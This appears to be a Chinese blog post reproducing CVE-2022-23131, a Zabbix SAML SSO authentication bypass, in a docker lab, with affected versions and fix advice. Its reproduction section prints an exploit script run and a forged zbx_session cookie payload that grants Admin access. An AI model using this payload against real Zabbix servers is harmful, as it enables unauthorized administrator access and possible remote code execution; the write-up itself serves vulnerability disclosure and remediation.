zabbix最新漏洞,可绕过认证登陆!

2022-08-28 12:16:53 浏览数 (1)

漏洞概述

漏洞编号:CVE-2022-23131

漏洞威胁等级:高危

Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。

Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE

影响范围

Zabbix Web前端版本包括

  • 5.4.0-5.4.8
  • 6.0.0alpha1

复现

虽然官方给是zabbix版本在5.4.0-5.4.8这个区间受影响,但是我在zabbix 5.4.11也同样复现了这个问题。

代码语言:shell复制
# 快速构建zabbix环境
]# docker run  --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2022_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie可以跳过认证。

image.pngimage.png

修改cookie

代码语言:shell复制
~]#  python CVE-2022-23131.py http://ip:49153/   
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}


加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
                                   

复制上面加密后Payload,修改zbx_session(在浏览器按F12,打开开发者工具)的值。

image.pngimage.png

修改完成之后,再次点击SAML,可直接跳过认证登陆!

image.pngimage.png
image.pngimage.png

修复建议

临时方案:禁用 SAML 身份验证

推荐方案:升级安全版本

0 人点赞